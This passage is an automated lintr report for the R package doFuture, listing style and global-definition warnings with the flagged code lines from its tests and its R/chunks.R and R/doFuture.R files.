^~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:98:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L98) *style:* **Lines should not be more than 80 characters.**\n```r\n​    dt <- run_example(topic = topic, package = pkg, run.dontrun = run.dontrun, local = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/glmnet/examples.R:11:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/glmnet/examples.R#L11) *style:* **Variable or function name should be snake_case.**\n```r\n​registerDoMC <- function(...) NULL\n^~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:15:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:30:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L30) *style:* **Lines should not be more than 80 characters.**\n```r\n​run_example <- function(topic, package, local = FALSE, run.dontrun = TRUE, envir = globalenv()) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:30:56:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L30) *style:* **Variable or function name should be snake_case.**\n```r\n​run_example <- function(topic, package, local = FALSE, run.dontrun = TRUE, envir = globalenv()) {\n                                                       ^~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:37:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:43:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:47:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:51:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L51) *style:* **Lines should not be more than 80 characters.**\n```r\n​run_examples <- function(package, topics = test_topics(package), strategy, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:57:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L57) *warning:* **no visible global function definition for ‘registerDoFuture’**\n```r\n​    registerDoFuture()\n    ^~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:58:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L58) *warning:* **no visible global function definition for ‘plan’, Did you mean 'lag'?**\n```r\n​    plan(strategy)\n    ^~~~\n```\n[inst/tests2/incl/utils.R:59:11:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L59) *warning:* **no visible global function definition for ‘run_example’**\n```r\n​    dt <- run_example(topic = topic, package = package, ...)\n          ^~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:83:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L83) *style:* **Lines should not be more than 80 characters.**\n```r\n​install_missing_packages <- function(pkgs, bioc = FALSE, repos = \"https://cloud.r-project.org\") {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:86:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L86) *style:* **Variable or function name should be snake_case.**\n```r\n​      .biocLite <- NULL\n      ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:90:11:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L90) *style:* **Variable or function name should be snake_case.**\n```r\n​          .biocLite <<- biocLite\n          ^~~~~~~~~\n```\n[inst/tests2/incl/utils.R:90:12:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L90) *warning:* **no visible binding for global variable ‘biocLite’**\n```r\n​          .biocLite <<- biocLite\n           ^~~~~~~~\n```\n[inst/tests2/incl/utils.R:130:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L130) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​  mprintf(\"Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n  ^~~~~~~\n```\n[inst/tests2/incl/utils.R:133:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L133) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:137:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L137) *warning:* **no visible global function definition for ‘mprintf’, Did you mean 'sprintf'?**\n```r\n​    mprintf(\"- Installing package: %s\", pkg)\n    ^~~~~~~\n```\n[inst/tests2/incl/utils.R:155:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L155) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.BatchJobs\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:159:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L159) *warning:* **no visible global function definition for ‘install_missing_packages’**\n```r\n​    install_missing_packages(\"future.batchtools\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:168:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L168) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:184:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[inst/tests2/incl/utils.R:185:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L185) *style:* **Lines should not be more than 80 characters.**\n```r\n​        mprintf(\"- Library path: %s\", paste(sQuote(.libPaths()), collapse = \", \"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/incl/utils.R:188:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/incl/utils.R:194:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L194) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/incl/utils.R:198:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/incl/utils.R#L198) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/tests2/NMF/manual.R:25:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/NMF/manual.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/plyr/examples.R:54:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/plyr/examples.R#L54) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, excl_dontrun)\n    ^~~~~~~~~~~\n```\n[inst/tests2/plyr/examples.R:55:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/plyr/examples.R#L55) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/plyr/examples.R:59:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/plyr/examples.R#L59) *style:* **Lines should not be more than 80 characters.**\n```r\n​    dt <- run_example(topic = topic, package = pkg, run.dontrun = run.dontrun, local = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/plyr/examples.R:62:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/plyr/examples.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[inst/tests2/TSP/examples.R:16:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/TSP/examples.R#L16) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, c(\"Concorde\", \"solve_TSP\"))\n    ^~~~~~~~~~~\n```\n[inst/tests2/TSP/examples.R:17:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/TSP/examples.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[inst/tests2/TSP/examples.R:24:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/TSP/examples.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/chunks.R:4:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:6:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:20:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/chunks.R:23:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n^~~~~~~~~~\n```\n[R/chunks.R:23:24:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n                       ^~~~~~~~~~~~~\n```\n[R/chunks.R:23:39:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​makeChunks <- function(nbrOfElements, nbrOfWorkers,\n                                      ^~~~~~~~~~~~\n```\n[R/chunks.R:24:24:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​                       future.scheduling = 1.0, future.chunk.size = NULL) {\n                       ^~~~~~~~~~~~~~~~~\n```\n[R/chunks.R:24:49:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L24) *style:* **Variable or function name should be snake_case.**\n```r\n​                       future.scheduling = 1.0, future.chunk.size = NULL) {\n                                                ^~~~~~~~~~~~~~~~~\n```\n[R/chunks.R:25:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L25) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(nbrOfElements >= 0L, nbrOfWorkers >= 1L)\n  ^~~~~~~~~~~\n```\n[R/chunks.R:32:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L32) *style:* **Variable or function name should be snake_case.**\n```r\n​    nbrOfChunks <- max(1, ceiling(nbrOfElements / future.chunk.size))\n    ^~~~~~~~~~~\n```\n[R/chunks.R:35:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L35) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​      stop_if_not(length(future.scheduling) == 1L, !is.na(future.scheduling))\n      ^~~~~~~~~~~\n```\n[R/chunks.R:37:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L37) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfWorkers\n        ^~~~~~~~~~~\n```\n[R/chunks.R:38:42:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L38) *style:* **Variable or function name should be snake_case.**\n```r\n​        if (nbrOfChunks > nbrOfElements) nbrOfChunks <- nbrOfElements\n                                         ^~~~~~~~~~~\n```\n[R/chunks.R:40:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L40) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfElements\n        ^~~~~~~~~~~\n```\n[R/chunks.R:47:41:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L47) *style:* **Variable or function name should be snake_case.**\n```r\n​      if (nbrOfWorkers > nbrOfElements) nbrOfWorkers <- nbrOfElements\n                                        ^~~~~~~~~~~~\n```\n[R/chunks.R:48:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L48) *style:* **Variable or function name should be snake_case.**\n```r\n​      nbrOfChunks <- future.scheduling * nbrOfWorkers\n      ^~~~~~~~~~~\n```\n[R/chunks.R:50:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L50) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- 1L\n        ^~~~~~~~~~~\n```\n[R/chunks.R:52:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L52) *style:* **Variable or function name should be snake_case.**\n```r\n​        nbrOfChunks <- nbrOfElements\n        ^~~~~~~~~~~\n```\n[R/chunks.R:57:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/chunks.R#L57) *warning:* **no visible global function definition for ‘splitIndices’**\n```r\n​  splitIndices(nbrOfElements, ncl = nbrOfChunks)\n  ^~~~~~~~~~~~\n```\n[R/doFuture-package.R:22:27:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture-package.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' * `plan(multiprocess)`: \n                          ^\n```\n[R/doFuture-package.R:45:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture-package.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/doFuture-package.R:74:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture-package.R#L74) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' error on \\code{Error in \\{ : task 1 failed - \\\"could not find function \"my_stat\" ...}.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/doFuture.R:7:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L7) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(inherits(obj, \"foreach\"))\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L8) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(inherits(envir, \"environment\"))\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:9:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:11:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L11) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ...\")\n             ^~~~~~\n```\n[R/doFuture.R:17:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L17) *warning:* **no visible global function definition for ‘iter’, Did you mean 'it'?**\n```r\n​  it <- iter(obj)\n        ^~~~\n```\n[R/doFuture.R:19:18:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L19) *warning:* **no visible global function definition for ‘makeAccum’**\n```r\n​  accumulator <- makeAccum(it)\n                 ^~~~~~~~~\n```\n[R/doFuture.R:20:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L20) *style:* **Variable or function name should be snake_case.**\n```r\n​  globalsAs <- data$globalsAs\n  ^~~~~~~~~\n```\n[R/doFuture.R:21:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L21) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(!is.null(globalsAs), length(globalsAs) == 1L)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:22:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:41:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L41) *warning:* **local variable ‘dummy_globals’ assigned but may not be used**\n```r\n​  dummy_globals <- NULL\n  ^~~~~~~~~~~~~\n```\n[R/doFuture.R:77:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L77) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:78:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L78) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:85:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L85) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- identifying globals and packages ...\")\n             ^~~~~~\n```\n[R/doFuture.R:86:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:98:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L98) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:103:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L103) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:105:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L105) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"  - R expression:\")\n    ^~~~~~\n```\n[R/doFuture.R:106:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L106) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​    mprint(expr)\n    ^~~~~~\n```\n[R/doFuture.R:109:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L109) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​    mstr(globals)\n    ^~~~\n```\n[R/doFuture.R:112:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:113:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L113) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- identifying globals and packages ... DONE\")\n    ^~~~~~\n```\n[R/doFuture.R:132:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L132) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​      stop_if_not(length(preschedule) == 1L, !is.na(preschedule))\n      ^~~~~~~~~~~\n```\n[R/doFuture.R:147:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L147) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Number of chunks: %d\", length(chunks))\n             ^~~~~~\n```\n[R/doFuture.R:155:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L155) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Number of futures (= number of chunks): %d\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:157:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L157) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Launching %d futures (chunks) ...\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:160:16:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L160) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    if (debug) mdebug(\"Chunk #%d of %d ...\", ii, length(chunks))\n               ^~~~~~\n```\n[R/doFuture.R:174:16:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L174) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    if (debug) mdebug(\"Chunk #%d of %d ... DONE\", ii, nchunks)\n               ^~~~~~\n```\n[R/doFuture.R:177:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L177) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"Launching %d futures (chunks) ... DONE\", nchunks)\n             ^~~~~~\n```\n[R/doFuture.R:178:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L178) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(length(fs) == nchunks)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:185:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L185) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- resolving future\")\n             ^~~~~~\n```\n[R/doFuture.R:186:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L186) *warning:* **no visible global function definition for ‘resolve’, Did you mean 'qr.solve'?**\n```r\n​  resolve(fs, value = TRUE)\n  ^~~~~~~\n```\n[R/doFuture.R:189:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L189) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- collecting values of future\")\n             ^~~~~~\n```\n[R/doFuture.R:190:31:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L190) *warning:* **no visible binding for global variable ‘value’**\n```r\n​  results <- lapply(fs, FUN = value, signal = FALSE)\n                              ^~~~~\n```\n[R/doFuture.R:192:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L192) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(length(results) == nchunks)\n  ^~~~~~~~~~~\n```\n[R/doFuture.R:196:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/doFuture.R:203:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L203) *style:* **Lines should not be more than 80 characters.**\n```r\n​    msg <- sprintf(\"Unexpected error in doFuture(): After gathering and merging the results from %d chunks in to a list, the total number of elements (= %d) does not match the number of input elements in 'X' (= %d). There were in total %d chunks and %d elements (%s)\", nchunks, length(results2), length(args_list), nchunks, sum(chunk_sizes), 